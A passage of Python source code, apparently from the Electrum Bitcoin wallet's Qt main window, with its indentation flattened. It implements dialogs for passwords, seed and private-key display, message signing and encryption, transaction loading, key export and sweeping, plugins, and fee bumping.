else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(QLabel(_('Lightning')), 5, 0)
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
